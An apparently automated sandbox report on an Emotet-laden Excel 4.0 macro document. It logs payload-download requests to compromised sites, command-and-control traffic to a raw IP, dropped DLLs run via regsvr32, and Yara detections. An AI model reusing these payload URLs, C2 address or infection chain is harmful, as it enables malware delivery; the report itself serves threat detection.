                      Source: regsvr32.exe, 00000009.00000002.1211805437.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155093375.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dllJump to behavior
                      Source: unknownDNS traffic detected: queries for: sat7ate.com
                      Source: global trafficHTTP traffic detected: GET /Adapter/moycMR/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.spinbalence.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /index.php?controller=404 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.spinbalence.comConnection: Keep-AliveCookie: PrestaShop-7318ab2db5e4a3c3a59fb8879ad22162=Nw04PzmYYXL6IgJsn1ERig61Z7mzgI5cdqQk7Ts1Z5oXp%2FAqcUL0r5BFPvLtErAiRnV0TG5b0npswANceXA1cwrQZJXojk9hvRnyRY37Ivk%3D000075
                      Source: global trafficHTTP traffic detected: GET /Content/Afa1PcRuxh/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.3d-stickers.comConnection: Keep-AliveCookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=9ybostxWPod7nP43PifVMefImKxeSKaZAdXmfdItKWNI2Ckr%2B1t%2BqGSwMBMouqmkFK0SD2XdZ7Cg5qtQQ9RwtmJfdpSnAaKPknzS3gL2v8c%3D000079
                      Source: global trafficHTTP traffic detected: GET /page-non-trouvee HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.3d-stickers.comConnection: Keep-AliveCookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=9ybostxWPod7nP43PifVMefImKxeSKaZAdXmfdItKWNolWp%2F7SQd8f90S8O%2FCwGohxkvf3iPluWhTbyznpM1hqQ6wpX78PX55d2aotWs5IA%3D000075
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: YYbWjqBjoLrCcX=SBgr/e6aC1IUNvJELTGXliW8JuD542AergoyMYXNvjxNLDRTdQNm8AuaxOmABbvgfv+8UtrcYH0nm8JVpNZn+3TWEfhRm/dUCR1CZolc/XwWvPSYMtjPL0bLJaxTy+IA9NnB1Bf21+p/nLECZUQKbQ3KotZmlTPMe1nDx9AvFrGbWdBwLhSH+OSwBm0uKoYGqTZIZ3usbgBMW4QV4nRpmrxN3K2+2Yb5BRhEeUfSv5e+Y0wUi7HP20VKUTWvvTmy+2YpSlrLS8NjnvoUHc/35DqIYRXDWKWVd2LKfBks9VLO8aBSd9lbpYy/Ixl+Ba5lMMnTILw8p+KXMtCwpS9WHost: 218.38.121.17
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: BepnebNbbnhLwN=d2b7sFWgS9DsqV+ktIDEPfDYK+u4VvGDu6RH8sqyC93zoy+j0gBi669p4anprtQEM0FTQaa5CcQDsE2n3Jik1MwelLYMW0cB2ckzSva1GTO9Ozuc6BuVVWHKD0CdjeEPdE+oGqdZWNtAUHV9t6hIutCFWcQnGko8pFlEzh+24tzbK7usfHuWSo1g9glenYgi3haMAIuRx4H0rCms/1aWJHObgPJCMzJMZePW+6QsU2qZksYBpCGLUBB4No5nO9JG4fI9x4h7VheOpHD72h9Li3R3N4z9E+yOI9ADuJ2vMtr3yhVwHost: 218.38.121.17
                      Source: global trafficHTTP traffic detected: GET /Adapter/moycMR/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.spinbalence.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /Content/Afa1PcRuxh/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.3d-stickers.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bsavxiv/axHQYKl/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: navylin.comConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 163.172.115.127:443 -> 192.168.2.22:49174 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 163.172.108.69:443 -> 192.168.2.22:49177 version: TLS 1.2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10025238 GetParent,ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10014B20 GetKeyState,GetKeyState,GetKeyState,SendMessageA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10025C50 GetKeyState,GetKeyState,GetKeyState,GetParent,GetParent,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,

                      E-Banking Fraud

                      barindex
                      Yara detected Emotet
                      Source: Yara matchFile source: 0000000A.00000002.1211606431.000000000017A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1211620382.000000000021A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 8.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.regsvr32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.regsvr32.exe.2b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.2c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.1211814809.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1213054445.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.942096747.00000000001C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.943086830.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1212856230.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1211836015.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Found malicious Excel 4.0 Macro
                      Source: 4470_02112022.xlsMacro extractor: Sheet: Sheet6 contains: URLDownloadToFileA
                      Source: 4470_02112022.xlsMacro extractor: Sheet: Sheet6 contains: URLDownloadToFileA
                      Office process drops PE file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\oxnv4.ooccxxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dllJump to dropped file
                      Found Excel 4.0 Macro with suspicious formulas
                      Source: 4470_02112022.xlsInitial sample: EXEC
                      Source: 4470_02112022.xlsInitial sample: EXEC
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\XXKTOC\Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_100073A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1003B0D0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1004E0F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10044160
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_100491A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10048210
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_100102D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1004B340
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1001C3CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1003E540
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1003B5D0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1003F650
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10031730
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10044730
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_100547A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1003D830
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10034910
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1002C9A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_100449B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1004E9C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10048A10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10031A60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10018A70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1003CC40
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10025C50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10027C6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10037CB0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10043CC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10001CC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10021CD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10013CFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10016D48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10054D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1003DD80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10034DC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1000FDC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10038DF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10033EB0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1004EED0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10040FB0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1004BFF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_001F0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800018F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180009AC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180003B78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800143B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002AC7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000DC7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800184BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001A788
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800247AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001D7F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000C800
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002B814
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180017824
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180003824
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002803C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180023840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001B058
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000D87C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800098AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800168B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800078B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800190BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002B0C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800040EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800288F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180021918
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180004918
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000C930
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180025938
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000F138
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000E93C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001D150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180022158
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180015958
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001A170
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180003970
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001298D
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180011194
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180029198
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000A198
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800031C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000C1E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000421C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180023228
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001CA34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001DA34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001EA38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002B23C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002A244
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000D250
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180027A68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180002A6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180014274
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180012288
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180012AA6
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800122C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800072CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180006ADC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800012F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000FB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001E30C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001531C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000A31C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180004B50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180029360
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180017B68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002539C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800033A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800233B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800243B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180006BBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001FBD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800043F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000C3F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001DC00
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001EC08
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180007418
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180025C1C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000A42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000E42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180028C38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180019C4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000145C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180002480
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180020490
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800164B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180017CC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180026CD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000BCD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800114E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800154EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001FD00
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002A518
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180020D20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001A524
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000D52C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180010D54
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180002D54
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002B55C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180004D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180024D84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002358C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180029590
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180021594
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001D5B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180027DB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001B5C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001FDF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000F60C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001E61C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180007620
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000BE20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001DE2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180023E4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180001650
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002765C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000EE5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180015E70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180017E74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000FE84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800056BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002B6C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001C6CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180020ED4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800116DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800166E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800036FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000D704
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180015714
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000E720
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180024F30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180001744
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180018764
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180028768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180010F74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180018F80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002A784
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180016F84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800027B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180026FBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180012FC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001FFD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800117E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_001B0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180025C1C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180019C4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180015E70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000DC7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180008688
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800078B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800058C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800018F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800132FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180009D2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180022334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180002D54
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180003B78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001A788
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001D5B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800143B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001FDF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800043F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000C3F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001D7F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001DC00
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000C800
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001EC08
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000F60C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002B814
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180007418
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001E61C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000421C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180007620
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000BE20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180017824
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180003824
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180023228
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180010628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001DE2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000A42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000E42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001CA34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001DA34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180028C38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001EA38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002803C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002B23C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180011C3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180023840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002A244
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180027448
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180023E4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180001650
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000D250
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001B058
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002765C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000145C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000EE5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180013A60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180027A68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180002A6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002AA74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180014274
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180017E74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002AC7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000D87C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180002480
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000FE84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180020490
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180029094
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800098AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800164B0
